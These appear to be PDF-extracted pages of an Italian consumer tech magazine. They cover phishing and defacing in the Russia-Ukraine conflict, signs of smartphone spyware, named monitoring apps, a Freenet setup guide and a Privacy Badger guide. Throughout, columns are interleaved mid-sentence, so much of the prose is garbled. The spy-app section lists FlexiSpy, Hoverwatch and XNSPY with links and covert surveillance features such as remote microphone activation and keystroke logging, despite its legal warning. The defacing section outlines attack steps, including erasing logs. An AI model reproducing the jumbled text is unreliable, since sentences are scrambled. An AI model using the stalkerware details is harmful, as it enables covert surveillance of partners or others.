strategia indiretta, che cerca di
raggiungere sempre il bersaglio
principale: i siti governativi o
quelli utili alla collaborazione tra
le truppe. Ma come funziona
nello specifico? Quali sono le
tecniche di difesa?
Senza scendere nei dettagli
tecnici (cosa che richiederebbe
troppo spazio visti gli
innumerevoli sistemi di phishing
oggi presenti), vediamo il
meccanismo di funzionamento
e iniziamo col dare una
definizione: si tratta di una
forma sofisticata di attacco
informatico, in cui gli aggressori I tentativi di phishing a opera dei russi nei confronti dell’Ucraina
cercano di ottenere si sono perpetrati per tutto il 2021 e il 2022.
informazioni sensibili. In altre Fonte: https://breakingdefense.com

38
PHISHING E DEFACING
Tipologie e tecniche di phishing
P hishing e-Mail: è la più tradizionale delle tecniche di
phishing, in cui l’attaccante utilizza tecniche di social
engineering per ingannare la vittima. Il vettore d’attacco è
Malware-Based Phishing: è una tipologia di phishing che
avviene attraverso l’avvio di un software dannoso sulla
macchina vittima. Il software viene scaricato dall’ignaro
rappresentato da una email fasulla contenente un link utente attraverso tecniche di social engineering oppure
malevolo su cui la vittima, ignara del pericolo, è portata a sfruttando vulnerabilità del sistema.
cliccare. DNS Phishing: il Domain Name System è il metodo
Spoofed WebSite: conosciuto anche come Phishing utilizzato per assegnare nomi ai nodi di una rete,
Website. L’attaccante plasma un sito falso (fake) “risolvendo” l’indirizzo IP. Avvelenando la risoluzione dei
clonandone uno lecito. La vittima che clicca sul link viene nomi, è possibile reindirizzare la vittima verso l’indirizzo
reindirizzata al sito Web malevolo (spesso molto simile desiderato dall’attaccante.
all’originale) nel quale gli vengono sottratte informazioni Content Injection Phishing: per questo tipo di phishing
sensibili, come password e username. viene compromesso un sito Web attendibile per far sì che
Phone Phishing (o vishing/SMSishing): l’attaccante ospiti contenuti malevoli.
impersona, con una chiamata o un messaggio di testo, Man-In-The-Middle Phishing (MITM): l’attaccante si
qualcuno che la vittima conosce o ritiene attendibile, con inserisce tra le due parti di una comunicazione (per
la finalità di compiere azioni malevole. esempio tra l’utente e il sito Web legittimo) cercando di
Social Media Phishing (Soshing): tra i canali più utilizzati ottenere informazioni intercettando le comunicazioni
dagli attaccanti per ottenere informazioni e raggirare le della vittima.
vittime ci sono i Social Media. Per esempio, gli attaccanti Search Engine Phishing: anche noto come SEO Black
possono circuire la vittima impersonando un nuovo Hat. L’attaccante ottimizza i siti malevoli nell’ottica SEO
contatto, oppure spingendola a visitare pagine di Social per indicizzarli in maniera legittima, in modo che
Media fasulle, finalizzate a estorcere informazioni appaiano all’utente durante la ricerca di prodotti o
sensibili. servizi.

considerare includono: attentamente i link nelle email o Verifica attentamente le


Errori ortografici e sui siti web. Passare il mouse comunicazioni: prima di cliccare
grammaticali: molti messaggi di sopra di essi senza fare clic per su link o aprire allegati, verificare
phishing contengono errori di visualizzare l’URL di attentamente la legittimità
scrittura (grammaticali e destinazione. Se sembra dell’email o del messaggio;
ortografici). Questi possono sospetto o diverso da quello controllare gli indirizzi dei
essere un segnale di un atteso, potrebbe trattarsi di un mittenti, cercare errori
messaggio non autentico. tentativo di phishing. ortografici o grammaticali e
Domini sospetti: controllare confrontare i link con l’URL
attentamente l’URL dei siti web a PROTEZIONE! ufficiale dell’organizzazione.
cui accedete. Domini con nomi Per proteggersi efficacemente Utilizzare software di
strani o leggermente diversi dal phishing è indispensabile sicurezza: installare e
rispetto a quelli legittimi seguire queste strategie di mantenere aggiornato un
possono essere un segnale di un protezione: software antivirus o antimalware
sito di phishing. Educazione e consapevolezza: affidabile sul dispositivo; questi
Richieste di informazioni mantenersi costantemente strumenti possono aiutare a
sensibili: organizzazioni informati sulle ultime tattiche di rilevare e bloccare potenziali
affidabili evitano di chiedere dati phishing e condividere queste minacce di phishing.
personali o finanziari tramite informazioni con familiari, amici Utilizzare l’autenticazione a
email o messaggi. Bisogna e colleghi; offrire formazione due fattori (2FA) su tutti gli
essere sospettosi se viene sulla sicurezza informatica account online quando possibile;
richiesto di condividere tali all’interno delle aziende e questa funzionalità aggiunge un
informazioni senza una valida promuovere una cultura di ulteriore strato di sicurezza
ragione. attenzione e prudenza nei richiedendo un secondo metodo
Link sospetti: controllare confronti dei potenziali attacchi. di verifica, come un codice

39
SICUREZZA
inviato tramite SMS o nelle operazioni di guerra. L’uso accompagnato da simboli o
un’applicazione di delle tecnologie digitali è immagini. L’obiettivo è attirare
autenticazione. diventato uno strumento l’attenzione e diffondere un
Verificare la sicurezza dei siti fondamentale per la messaggio o una propaganda
web: prima di inserire propaganda, l’acquisizione di specifica.
informazioni personali o informazioni e, in alcuni casi, per
finanziarie su un sito web, l’esecuzione di attacchi mirati. RUSSIA-UCRAINA
verificare che sia protetto Uno degli esempi più evidenti di Durante il conflitto, il defacing è
tramite il protocollo HTTPS e che tali attività si è verificato durante emerso come una tecnica molto
il certificato di sicurezza sia il già citato conflitto tra Russia e utilizzata da entrambe le parti
valido; si può fare osservando il Ucraina, in cui è emerso l’utilizzo coinvolte. Gruppi di hacker legati
prefisso “https://” e il lucchetto diffuso anche della tecnica a entrambi i Paesi hanno preso
nella barra degli indirizzi del tuo hacker nota come “defacing”. di mira i siti web istituzionali e i
browser. Conosciuto anche come media online, sostituendo i
Segnalare gli attacchi di “vandalismo digitale”, il contenuti originali con messaggi
phishing: comunicare sempre defacing – volendo semplificare politici, minacce o dichiarazioni
gli attacchi di phishing alle – prevede la modifica del di vittoria. Attacchi che avevano
autorità competenti, come la contenuto di un sito web o di lo scopo di influenzare l’opinione
polizia o l’organizzazione anti- una piattaforma online senza il pubblica, destabilizzare
cybercrime; inoltre, contattare permesso del proprietario. l’immagine del nemico e creare
l’organizzazione legittima Solitamente si utilizza per confusione all’interno dei
coinvolta per informarla sostituire la pagina principale di rispettivi governi.
dell’attacco. un portale con un messaggio L’uso diffuso del defacing ha
personalizzato o politico, spesso sollevato da subito numerose
CONCLUSIONI
Il phishing rappresenta, dunque,
una minaccia persistente nel Meccanismo d’attacco
panorama della sicurezza
informatica. Tuttavia,
conoscendo i concetti
L ’attacco di defacing si basa su diverse vulnerabilità comuni presenti nei siti
web e nelle piattaforme online. Un processo generale che gli attaccanti
compiono per eseguire un attacco è il seguente:
fondamentali, le tecniche 1. Identificazione del bersaglio: si individua il sito web o la piattaforma che
utilizzate dagli aggressori e le si intende attaccare. Spesso, i siti vulnerabili o quelli che hanno un alto valore
strategie di protezione, è simbolico o politico diventano obiettivi primari.
2. Ricerca di vulnerabilità: si conduce una ricerca approfondita sulle
possibile ridurre
eventuali debolezze presenti nel sito web target. Ciò può includere l’analisi
significativamente il rischio di delle versioni obsolete del software, delle imperfezioni nella configurazione
cadere vittima di un attacco. del server o delle possibili falle di sicurezza nei plugin e nelle estensioni
Bisogna ricordare sempre di utilizzate.
3. Sfruttamento delle vulnerabilità: una volta individuata una vulnerabilità,
essere vigili, educare se stessi e
si sfrutta quest’ultima per ottenere l’accesso non autorizzato al sistema di
gli altri, e utilizzare le misure di gestione del contenuto o al server che ospita il sito web. Questo può essere
sicurezza consigliate per fatto utilizzando tecniche come l’iniezione di codice (per esempio, SQL
proteggere i dati e l’identità injection) o sfruttando vulnerabilità specifiche del software utilizzato.
online. 4. Modifica del contenuto: una volta ottenuto l’accesso, si va a modificare il
contenuto del sito web. Questo può includere la sostituzione della home
page con un messaggio personalizzato, l’inserimento di immagini, testi o
PASSIAMO AL DEFACING video a sostegno di una causa politica o semplicemente il vandalismo digitale.
Come detto, negli ultimi anni, il 5. Copertura delle tracce: infine, si coprono le proprie tracce eliminando i
mondo ha assistito a un log di accesso o modificando le registrazioni dei file di sistema. Questo rende
più difficile per gli investigatori risalire all’identità degli attaccanti.
crescente coinvolgimento delle
attività informatiche, soprattutto

40
PHISHING E DEFACING
proprietario del sito web che
per l’opinione pubblica. Alcune
delle implicazioni più comuni
sono: il danneggiamento
dell’immagine, vista la
compromissione della
reputazione di
un’organizzazione o di un
individuo e la percezione dei
visitatori del sito che
potrebbero intendere
l’incidente come un fallimento
nella sicurezza e nella gestione
dei dati; la propagazione della
disinformazione, dato che gli
attacchi di defacing spesso
mirano a diffondere un
messaggio politico o a
promuovere una propaganda
specifica.
E questo può influenzare
l’opinione pubblica e creare
tensioni sociali.
Per mitigare gli attacchi di
defacing, è fondamentale
adottare adeguate
contromisure: aggiornamenti
regolari (mantenere il
software, i plugin e le
estensioni del sito web sempre
aggiornati riduce il rischio di
sfruttamento di vulnerabilità
L’SQL injection è una tecnica usata per attaccare applicazioni che conosciute); accessi sicuri
gestiscono dati mediante DB relazionali. In foto, la classificazione (utilizzare password forti,
dei vettori di attacchi SQL injection nel 2010. autenticazione a due fattori e
limitare gli accessi privilegiati
preoccupazioni per la sicurezza sia facile per i gruppi hacker solo agli utenti autorizzati);
informatica. Innanzitutto, ha manipolare e diffondere la monitoraggio costante
evidenziato l’importanza di disinformazione. Questo tipo (implementare strumenti di
proteggere adeguatamente i di attacco può infatti monitoraggio e rilevamento
siti web istituzionali e le influenzare l’opinione pubblica delle anomalie per identificare
piattaforme online. Un attacco e creare tensioni tra le nazioni potenziali attacchi e
di tale tipo può danneggiare la coinvolte. rispondere tempestivamente);
reputazione di backup regolari (eseguire
un’organizzazione o un Paese e CONTROMISURE regolarmente backup dei dati
causare confusione tra i Le conseguenze di un attacco del sito web per ripristinare
cittadini. In secondo luogo, il di defacing possono essere rapidamente il contenuto
defacing ha dimostrato quanto significative, sia per il originale in caso di attacco).

41
SICUREZZA

MA, C’È UNA


SPIA NELLO ?
SM A RT P H O N E li pe r ap p “ficcanaso” che possono
sp os itivi idea
I telefoni cellulari sono di di da ti pe rson ali: posizione, contatti,
qu an tità
accedere a una vasta m e sc oprire se siete spiati
e video. Ec co co
messaggi, foto
egli ultimi anni, con distanza, con tutte le implicazioni che consentono di condividere in

N l’incremento dell’utilizzo
degli smartphone anche
da parte di persone non
avvezze alla tecnologia, si è
verificato un aumento
che ne derivano. Altre volte sono
app comuni, spesso utilizzate
quotidianamente, che possono
rivelarsi pericolose. Tali software
possono raccogliere dati personali
tempo reale la propria posizione e
i percorsi scelti; se tali informazioni
vengono condivise con utenti
sconosciuti iscritti all’app,
diventerebbero risorse preziose
esponenziale delle attività di che, nelle mani di individui per potenziali criminali, che
spionaggio digitale. Applicazioni malintenzionati, diventano potrebbero monitorare la vostra
progettate e installate a insaputa informazioni di valore. Come posizione, così come i giorni e gli
dell’utente che consentono a terzi alcune app destinate agli orari in cui vi allenate, con tutto
di accedere al dispositivo a appassionati di corsa o ciclismo quello che comporta!

I segnali che vi devono mettere in allarme!


M a quali sono i campanelli d’allarme indicatori
che il vostro smartphone è stato compromesso
da uno o più spyware?
3) Ritardi o malfunzionamenti: se il telefono diventa
lento o si blocca di frequente, potrebbe essere un
segnale che un’app spia sta sovraccaricando il sistema;
4) Ricevere messaggi o chiamate inaspettate:
1) Il consumo anomalo della batteria: se la batteria ricevere messaggi o chiamate da numeri sconosciuti
si scarica molto rapidamente, anche quando non viene potrebbe essere un tentativo di comunicare con il
utilizzato intensamente, potrebbe essere un segnale di dispositivo spiato;
un’applicazione spia in esecuzione in background; 5) Rintracciare applicazioni sconosciute: se si notano
2) L’aumento insolito del traffico dati: un aumento applicazioni sul telefono di cui non si ricorda
inusuale del traffico dati potrebbe indicare che un’app l’installazione, potrebbero indicare app spia installate
spia sta trasmettendo dati dal dispositivo; furtivamente nello smartphone.

42
APP SPIA
MA IO SONO SPIATO?
Installando alcune app, i BASTA INSTALLARE UNA SOLA APP
cybercriminali hanno la
possibilità di intercettare e
PER SCOVARLE TUTTE...
registrare chiamate in tempo Ecco come rintracciare applicazioni e servizi annessi
reale, sia che avvengano tramite che “girano” di nascosto sullo smartphone.
una linea telefonica tradizionale
sia mediante applicazioni come
1 SCARICATE L’APP DALLO STORE
Dal Play Store cercate l’app App Killer: Close running
Facebook, Skype e WhatsApp; Apps, quindi procedete con l’installazione cliccando
senza contare che spesso sono sul pulsante Installa e poi su Apri, alternativamente
anche in grado di attivare il potete raggiungere l’app direttamente visitando
microfono da remoto e questa URL: https://play.google.com/store/apps/
details?id=com.killapps.closeapps.
registrare l’ambiente circostante!
closerunningapps&hl=it&gl=US. L’app, semplicissima da
E quindi, come comportasi? usare, consente di accedere a tutte le app e servizi
Come ci si può difendere? annessi attualmente in uso sullo smartphone
Beh, partiamo dai controlli che (pulsante Close All Running Apps), tutte le app
possono indicarci una spia... installate sul dispositivo (App Manager) e la lista delle
Passo 1 - Controllate app e app che ritenete essere sicure (White List). Cliccando
sui primi due pulsanti potrete accedere a una serie di
processi in esecuzione: fatelo
informazioni molto utili.
ricorrendo ad app specifiche
(vedi tutorial a destra). Se 2 QUALI APP GIRANO A VOSTRA INSAPUTA?
doveste notare applicazioni o Il pulsante Close All Running Apps mostra l’elenco
processi non riconosciuti, o che delle app e dei servizi attualmente avviati sullo
consumano molte risorse, smartphone. Cliccando sulla singola app, poi su App
information, potrete ottenere maggiori info a
potrebbe essere il segno di
riguardo: tempo di utilizzo, traffico dei dati ecc. o
un’app spia installata a vostra disinstallarla direttamente. Per stoppare tutte le app
insaputa. istantaneamente potete cliccare sul pulsante
Passo 2 - Controllate le reti: circolare rosso posto al centro della schermata; la
accedete alle impostazioni del prima volta l’app vi inviterà a concedere le
dispositivo e controllare tutte le autorizzazioni necessarie dirottandovi nel menu
Accessibilità di Android dal quale flaggare la voce
voci presenti nella sezione
Usa App Killer. Se ritenete l’app utile, potrete
networking. Fate attenzione ai aggiungerla alla White List cliccando sull’omonimo
nomi di reti non riconosciute. pulsante verde.
Anche questo potrebbe essere
il segno della presenza di 3 LE APP INSTALLATE NELLO SMARTPHONE
Dal menu principale dell’app è possibile accedere a
un’app che sta configurando il
tutte le app installate nel dispositivo: basterà cliccare
dispositivo per inviare dati in sul pulsante App Manager. Anche in questo caso
remoto. l’app vi consentirà di accedere a info dettagliate su
Passo 3 - Controllate il traffico ciascuna app elencata e la possibilità di aggiungerla
dati: sempre nelle alla White List. L’iconcina filtro posta in alto a destra
impostazioni del telefono, consente di filtrare le app tra quelle di sistema e
quelle installate a livello utente. Sempre dal menu
controllate il traffico di rete.
principale dell’app è possibile cliccare su White List
Trasferimenti di dati per accedere all’elenco di tutte le applicazioni che nel
pesanti o applicazioni non tempo sono state contrassegnate come “sicure”. In
riconosciute che spostano con ogni momento sarà possibile rimuovere ogni singola
una certa frequenza dati in app dalla lista cliccando sul relativo pulsante Remove
rete, potrebbero essere un from White List.
segnale di una o più app spia.

43
SICUREZZA
RIMUOVERE I MALWARE IN POCHI CLIC... E NON SOLO!
Grazie a un potente tool potete eseguire una scansione gratuita del sistema
per rilevare minacce e vulnerabilità, scovare le applicazioni dannose prima
ancora che si installino, bloccare collegamenti e siti web pericolosi, verificare
la sicurezza delle reti Wi-Fi ed eventuali configurazioni del sistema in grado
compromettere il dispositivo.
1 2

PER ANDROID E IOS LA PRIMA SCANSIONE


Il primo passo è scaricare l’applicazione di Avast che La prima volta che utilizzate l’app, cliccando sul
consente di rintracciare le app dannose. Dal vostro pulsante centrale Avvia scansione vi verrà chiesto
dispositivo Android o iOS collegativi allo store di concedere le dovute autorizzazioni perché Avast
ufficiale e ricercatela digitando Avast Antivirus e possa accedere ai file presenti nel vostro
Sicurezza. Una volta installata e avviata, l’app dispositivo. Sarà quindi necessario flaggare la voce
propone un upgrade alla versione a pagamento con Consenti l’accesso per gestire tutti i file e cliccare
più funzionalità: ignorate l’avviso per procedere con sulla freccia in alto a sinistra per procedere con la
l’utilizzo gratuito. scansione.

3 4

CI SONO PROBLEMI DA RISOLVERE!


Terminata l’analisi il tool vi proporrà una lista delle eventuali criticità da risolvere.
Nel nostro caso, Avast ha rilevato 3 minacce. Cliccando sul pulsante Risolvi il sistema mostrerà le criticità individuate
dettagliandole e guidandovi passo dopo passo sulla risoluzione immediata (alcune delle problematiche individuate
possono essere risolte automaticamente da Avast passando alla versione a pagamento).

44
DASDASDSDASDASDASD
APP SPIA
SU ANDROID E OLTRE
Sul sistema operativo di Google iPhone: sei più al sicuro?
è presente Google Play Protect,
un’app pre-installata che
verifica le applicazione scaricate
dal Play Store. Tuttavia, in molti
casi, per funzionalità specifiche,
è preferibile ricorrere a
soluzioni più efficaci. Come
quelle che riportiamo di
seguito, tra le migliori app utili
a verificare la presenza di
applicazioni spia sullo
smartphone.
La prima si chiama
Malwarebytes Mobile
Security, è un’app disponibile
per Android e iOS. Abbiamo
deciso di citarla perché è
capace di scovare, oltre ai
malware, anche i tentativi di
furto di identità, e altre
minacce online. Offre infatti
funzionalità anti-malware,
blocco degli annunci
pubblicitari, filtri e algoritmi in
grado di bloccare siti di
S ebbene l’approccio di Apple in
alcuni contesti possa
sembrare poco intuitivo per gli
consente l’installazione di qualsiasi
app sul dispositivo, fuori quindi dal
recinto delle app presenti sullo
phishing e altri siti dannosi che utenti, si dimostra estremamente store ufficiale di Apple. Tra queste
potrebbero contenere anche efficace nella protezione della “app non ufficiali” è possibile
spyware e ransomware. privacy. iOS, infatti, impedisce imbattersi in software dannosi
alle app di accedere capaci di installare malware, rubare
E poi c’è Bitdefender Mobile profondamente al sistema, dati personali o compiere
Security che offre protezione prevenendo qualsiasi tentativo di qualunque altra operazione
antivirus grazie a un potente monitoraggio delle attività sul criminale già accennata in questo
scanner integrato (su Android), telefono. articolo. Per verificare se il proprio
Questo almeno per quanto iPhone, magari acquistato di
la possibilità di impedire l’uso
riguarda un dispositivo non seconda mano, è stato oggetto di
improprio di qualsiasi app del manomesso; esiste infatti la jailbreak, è sufficiente cercare l’app
proprio smartphone (Android e possibilità di effettuare su alcuni Cydia. Se presente, è probabile che
iOS) che invia informazioni su iPhone il cosiddetto jailbreak, che il dispositivo sia stato jailbreakato.
Internet e di eseguire una
scansione utile a scoprire e
correggere la presenza di
configurazioni errate. Cos’è Google Play Protect?
Consente anche di bloccare,
geolocalizzare ed emettere un
allarme cancellando i contenuti È il sistema di protezione anti-malware integrato in tutti i dispositivi Android di
ultima generazione. Controlla le app già al momento del download dal Play
Store ed esegue periodicamente la scansione del dispositivo alla ricerca di app
dello smartphone da remoto. potenzialmente dannose, eventualmente inviando notifiche di alert, disattivando
Infine, la funzionalità VPN vi fa le app ritenute malevoli o rimuovendole automaticamente.
navigare in perfetto anonimato!

45
SICUREZZA
APP CHE (IN MANI HOVERWATCH ATTENZIONE!
SBAGLIATE!) POSSONO Accedendo al sito ufficiale si È opportuno ricordare, in questa
DIVENTARE PERICOLOSE legge: “Questa è la migliore sede, e bisogna farlo con enfasi,
Le app spia sono quasi sempre applicazione per proteggere le che l’atto di spiare un
frutto di malware, tuttavia anche proprie famiglie e le imprese”. E dispositivo mobile altrui non è
software apparentemente infatti si tratta proprio di un soltanto una violazione della
innocui e utili, come ad esempio software dedicato alla privacy dell’individuo, ma
di controllo parentale, nelle sicurezza. Ma, installando rappresenta a tutti gli effetti
mani sbagliate possono Hoverwatch, non è difficile un illecito penale. Questo
trasformarsi in potenti spie accedere ad app social e di genere di comportamento,
digitali, così come quelle messaggistica (SMS, Facebook, spesso dettato da curiosità, dalla
riportate di seguito... WhatsApp ecc), cronologia delle gelosia o, in alcuni casi, da
chiamate, microfono, intenzioni maligne, non deve
FLEXISPY fotocamera, GPS tracking, attività essere sottovalutato nella sua
Si tratta di un software di sul web, calendario e contatti. gravità! La legge italiana, infatti,
monitoraggio e controllo https://www.hoverwatch.com/it/ prevede sanzioni severe per chi si
parentale. Ma ciò non impedisce rende colpevole di tali azioni.
ai malintenzionati di utilizzarlo XNSPY Nello scenario legislativo emerge
per altri fini. Con Flexispy, infatti è È un’applicazione che consente chiaramente come vi siano delle
facile attivare da remoto il di controllare telefonate e ripercussioni concrete per chi
microfono per ascoltare e contatti, posizione GPS, app di decide di violare l’intimità altrui
registrare (anche le telefonate messaggistica, ricevere avvisi attraverso l’accesso non
live), localizzare il dispositivo, istantanei su parole specifiche autorizzato a dispositivi
monitorare le app di chat, digitate, inviare comandi elettronici. Le condanne, in
contatti, calendari, cronologia e remoti per la registrazione, particolare, possono variare in
preferiti web, scattare foto a acquisire schermate da base alla gravità e alla natura
distanza, registrare ogni tasto remoto, visualizzare tutte le del reato, ma possono arrivare,
premuto dall’utente. attività web. in certe circostanze, anche ai
https://www.flexispy.com/it/ https://it.xnspy.com/. quattro anni di reclusione.

Buoni consigli per evitare le infezioni...


E sistono determinate linee guida fondamentali che
dovreste adottare per minimizzare il rischio di
contaminazione del vostro dispositivo mobile da agenti
anche sui dispositivi mobili è di primaria importanza
esercitare cautela nei confronti di link, allegati e
connessioni Wi-Fi pubbliche non cifrate. Tali elementi
malevoli, come gli spyware, appunto. Innanzitutto, la possono costituire vettori di attacco per entità malevole
raccomandazione è di astenervi dall’installare intenzionate a iniettare spyware nei dispositivi.
software di terze parti sui vostri dispositivi. Il Pertanto, evitate di collegarvi a reti pubbliche
consiglio è attingere solo dalle piattaforme ufficiali, sconosciute e astenetevi dal cliccare su link o aprire
quali l’App Store per IOS o Google Play per Android. allegati provenienti da mittenti non verificati o
Quando selezionate un’applicazione, in particolar modo sospetti. In conclusione, assicuratevi di garantire
su dispositivi Android, è imperativo optare solo per un’adeguata protezione fisica del vostro
sviluppatori di comprovata affidabilità. Durante il dispositivo. Vi suggeriamo infine di configurare in
processo di installazione di una nuova applicazione, poi, modo rigoroso una schermata di blocco e di vigilare
valutate con precisione le autorizzazioni sollecitate sulla custodia del vostro dispositivo, in modo da
dall’app in questione. Se emergono delle perplessità, si precludere accessi non autorizzati che potrebbero
raccomanda prudenza, magari evitando l’installazione. portare all’installazione di software malevoli o alla
Allo stesso modo di quanto accade su sistemi desktop, compromissione di informazioni riservate.

46
H OW TO
RETI P2P La rete anticensura oltre il DarkWeb
Si accede tramite un apposito tool e ci si trova davvero l’impossibile.
Cosa abbiamo scoperto... ������������������������������������������������������������������������������������������������������������������������������48

PRIVACY BADGER Dite STOP al tracciamento


Il tool consigliato da Anonymous che protegge la tua privacy online ����������������������������� 50

GAME Gothic 2 conquista anche il Pinguino!


Siamo riusciti a installare su Linux il mitico gioco di ruolo.
Ecco il diario della ricompilazione ����������������������������������������������������������������������������������������������������������� 52

47
HOW TO

LA RETE ANTICENSURA
OLTRE IL DARKWEB!
Si accede tramite un apposito tool e ci si trova davvero l’impossibile.
Ecco cosa abbiamo scoperto

V
olendo darne una un documento, questo viene
IN BREVE defezione, possiamo dire suddiviso in pezzi e replicato su
Come collegarsi e che Freenet è una rete diversi nodi nella rete e ciò consente
navigare su Freenet peer-to-peer (P2P) che di garantire la disponibilità dei dati
DIFFICOLTÀ consente agli utenti di condividere e anche in presenza di nodi che
accedere a dei contenuti in modo lasciano la rete o vengono rimossi. A
sicuro e anonimo. In pratica, è un ciascun “pezzo” viene poi associata
software open source che permette una chiave crittografica generata dal
di collegarsi a una Rete contenuto stesso: gli utenti possono
decentralizzata e resistente alla dunque cercare e accedere ai
censura. Un sistema progettato per contenuti utilizzando le suddette
AVVERTENZE!
consentire agli utenti di scambiarsi chiavi, senza rivelare così quali dati
Prima di vedere come
installare e utilizzare il file e comunicare in modo sicuro si stanno cercando o condividendo.
software Freeneet, visti i senza rivelare la propria identità o la
vantaggi offerti e il posizione fisica. STOP ALLA CENSURA!
sistema di
funzionamento, è bene Grazie alla natura decentralizzata di
fare due premesse. La COME FUNZIONA? Freenet, la rete è resistente alla
prima: navigando su Quando un utente invia una censura. Poiché i contenuti sono
Freneet noterete una
certa lentezza nel richiesta o scambia un file su distribuiti sui nodi, diventa difficile,
caricamento delle pagine. Freenet, i dati vengono suddivisi in se non impossibile, per un’entità
Questo è dovuto al tempo
piccoli pezzi e cifrati. Questi pezzi centrale o un governo individuare e
per il download dei vari
“pezzi” sparsi nei nodi vengono inviati attraverso una serie bloccare o rimuovere dei contenuti
che vengono poi di nodi intermedi, chiamati nodi di specifici. Senza contare che Freenet
“ricostruiti” dal
programma sulla vostra
routing, che non consentono di consente agli utenti anche di
macchina. La seconda: determinare l’origine o la comunicare in modo anonimo
fate attenzione a cosa destinazione dei dati. In sostanza, attraverso i forum di discussione e i
scaricate. Dato
l’anonimato e l’assenza non esiste un server centrale o servizi di messaggistica disponibili.
di censura, infatti, c’è chi un’autorità di controllo: i nodi sono Il sistema di funzionamento e le
ha pensato bene di tutti uguali e cooperano tra loro per caratteristiche tecniche di Freenet
caricare e/o diffondere
sulla rete anche mantenere e distribuire i file. hanno fatto sì che il software venisse
contenuti, per così dire, Freenet utilizza anche un sistema di anche suggerito dal collettivo
poco ortodossi... Occhio, storage particolare e distribuito per Anonymous in quella che abbiamo
quindi, potreste
ritrovarvi nel Pc file archiviare i dati condivisi: come definito più volte come “La cassetta
vietati dalla legge! accennato, quando un utente carica degli attrezzi anticensura”.

48
FREENET
FREENET, PER UNA NAVIGAZIONE LIBERA
1 2

FILE D’INSTALLAZIONE TOOL PRONTO ALL’USO!


Collegatevi all’indirizzo https://freenetproject.org/ Cliccate su Avanti per tre volte a poi su Installa. Al
pages/download.html e cliccate sul pulsante termine della procedura d’installazione (che dura
DOWNLOAD FREENET FOR WINDOWS per pochi istanti) selezionate il tasto Fine, lasciando
scaricare il file d’installazione. Al termine del spuntato il flag su Avvia Freenet. Vedrete apparire, in
download, fatte doppio clic sull’eseguibile appena basso a destra, un messaggio che vi avvisa della
prelevato e aspettate qualche istante. Selezionate la presenza di una nuova icona sulla barra delle
lingua Italiano e cliccate su OK. applicazioni.

3 4

PRIME IMPOSTAZIONI SOLO CON GLI AMICI


Cliccate sul simbolo di Freenet: vedrete aprirsi una Cliccate su CONFIGURAZIONE e subito dopo su Livelli di
finestra del vostro browser predefinito (in incognito) con sicurezza. Scegliete NORMALE come livello di sicurezza e
le impostazioni di configurazione. Qui potete stabilire la ALTO come modalità darknet. Ricordate, infatti, che se
velocità in download e in upload e se impostare una conoscete almeno 3 persone che usano già Freenet, potete
password all’avvio di Freenet. Il nostro consiglio è di abilitare quest’ultima modalità: così Freenet si connetterà
lasciare tutto così com’è e cliccare su Save. solo con i vostri amici.
5 SIAMO NEL FREENET
Impostando un livello di sicurezza BASSO, invece, si avrà
la possibilità di visitare siti, dialogare con altri utenti e
scaricare/caricare materiale anche non essendo “amici”.
Per farlo, recatevi nella pagina principale e iniziate a
visitare gli Starting Points. Da lì potrete muovervi tra le
pagine e compiere le operazioni che ritenete opportune
senza essere censurati in alcun modo. Visitate anche le
pagine che riportano la Documentazione relativa a
Freenet e i blog dei team. Prenderete dimestichezza con
questo nuovo mondo.

49
HOW TO

DITE STOP
AL TRACCIAMENTO
Grazie a un’estensione per il browser, proteggerete la vostra privacy
e l’invasione operata dalla pubblicità. Ecco come funziona

P
rivacy Badger è un’estensione comportamenti e alle preferenze. Per
IN BREVE per browser sviluppata esempio, se si visita regolarmente un
Come utilizzare dall’Electronic Frontier sito che utilizza un servizio di
correttamente Privacy Foundation (EFF), tracciamento legittimo, Privacy Badger
Badger per proteggere
un’organizzazione non profit impegnata imparerà a non bloccare quel
la vostra privacy in
Rete nella difesa della privacy e dei diritti particolare elemento, garantendo così
digitali degli utenti. L’obiettivo principale una navigazione fluida.
DIFFICOLTÀ
è quello di impedire il tracciamento
online non desiderato e proteggere la PERSONALIZZAZIONE
privacy durante la navigazione. L’estensione offre un livello di
protezione della privacy
COME FUNZIONA personalizzabile. Dopo l’installazione,
Disponibile per diversi browser, tra cui inizia subito a bloccare gli elementi di
Chrome e Firefox, si occupa di bloccare i tracciamento che rileva.
cosiddetti tracker. In sostanza, quando Tuttavia, dà anche all’utente la
si naviga su un sito, l’estensione analizza possibilità di modificare le impostazioni
gli elementi della pagina e rileva i di blocco in base alle proprie
tentativi di tracciamento di terze parti, preferenze: è possibile decidere di
come cookie e script. Le frena e consentire il tracciamento su un
impedisce loro di raccogliere dati sulle determinato sito o bloccarlo oppure di
attività online. Interessante è visualizzare la lista dei siti web visitati e
l’apprendimento automatico. Ciò gli elementi di tracciamento bloccati per
significa che impara dalle interazioni con ciascuno di essi e rimuovere il blocco,
i siti web nel tempo, adattandosi ai giusto per fare qualche esempio.

DO NOT TRACK (DNT)


tracciati. Privacy Badger rafforza
P rivacy Badger si integra anche con
la funzionalità DNT (Do Not Track)
presente in molti browser. Si tratta di
questa protezione aggiuntiva,
bloccando gli elementi di tracciamento
raccogliere dati nonostante la
preferenza segnalata. E Privacy Badger
interviene in questi casi, impedendo il
una funzione che invia un segnale ai che ignorano il segnale DNT. Di fatto, tracciamento e proteggendo la
siti web che si visitano, indicando la non tutti i siti web rispettano il segnale privacy, anche quando i portali non
propria preferenza di non essere DNT: alcune società continuano a rispettano la richiesta.

50
PRIVACY BADGER
BLOCCARE I TRACKER CON UN CLIC DEL MOUSE
1 2

L’ESTENSIONE INSTALLAZIONE
Collegatevi sul chrome web store all’indirizzo https:// Selezionate il pulsante azzurro Aggiungi e, subito dopo,
chrome.google.com/webstore/category/extensions. Se Aggiungi estensione. Una finestra pop-up vi avviserà
utilizzate Firefox, invece, andate su https://addons.mozilla. della corretta installazione. Cliccateci su. Vi si aprirà una
org/it/firefox/extensions/. Cercate “privacy badger” finestra del browser con il sito di benvenuti e un
nell’apposito campo di ricerca e cliccate sul primo risultato. messaggio “Grazie per aver installato Privacy Badger!”.

3 4

IL PRIMO BLOCCO QUESTO SITO NO!


Riavviate il browser e accedete a un sito qualsiasi: per Da questa prima finestra avete già la possibilità di non utilizzare,
esempio, il portale de La Stampa. Cliccate sul simbolo del e quindi di disattivare, Privacy Badger per il sito che state
puzzle in alto a destra nella barra degli indirizzi e selezionate visitando. Per farlo, ovviamente, basta cliccare sul pulsante
l’estensione appena installata. Un primo messaggio vi avvisa Disattiva per questo sito. Esiste anche la possibilità di inviare
che sono stati bloccati ben 23 potenziali tracker. una segnalazione alla EEF per Sito malfunzionante.

5 6

